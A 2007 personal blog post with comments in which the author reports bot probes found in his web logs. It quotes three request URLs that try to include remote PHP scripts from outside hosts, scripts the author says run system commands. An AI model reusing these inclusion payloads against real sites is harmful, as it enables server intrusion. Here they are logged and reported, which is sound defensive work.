« I surrender — Lisp really is better than C++
Google comes through! »

Geek Drivel is under attack!

Over the past couple days, I’ve noticed three odd URLs in my web logs, from three different IP addresses, all using different versions of libwww-perl as the browser ID:

  • /category//includes/global.php?nbs=http://nusay.webng.com/31337.txt???
  • /category//includes/auth.php?nbs=http://nusay.webng.com/31337.txt??
  • /category//includes/global.php?nbs=http://usuarios.arnet.com.ar/larry123/safe.txt?

    • Curious, I checked out the “31337.txt” and “safe.txt” files… they were very similar, both consisting of near-identical PHP instructions that tried to get information about the system and run system commands. It looks like some kind of cross-site scripting attack attempt. I did a Google search on one of the more unique lines and discovered that this is some script-kiddie’s new toy… at least one botnet has been spewing these things out for the last several days. I’m not sure what it’s trying to exploit, but I’m happy to say that WordPress 2.2.2 (just released a few weeks ago, and which I upgraded to almost immediately) seems to be immune to it.

    This entry was posted on Thursday, August 23rd, 2007 at 8:28 pm and is filed under Spamity spam, spamity spam.... You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

    4 Responses to “Geek Drivel is under attack!”

    1. Joshua Lee Says:
      August 23rd, 2007 at 9:14 pm

      Not only that, your blog is under attack by reddit readers! Aieee!

    2. Head Geek Says:
      August 23rd, 2007 at 11:35 pm

      Not to mention ycombinator readers. :-)

    3. Joshua Lee Says:
      August 24th, 2007 at 8:05 am

      Well, at least you’re not being slashdotted. ;-)

    4. Head Geek Says:
      September 3rd, 2007 at 10:55 pm

      Closing comments, as this entry has suddenly become a spam-magnet.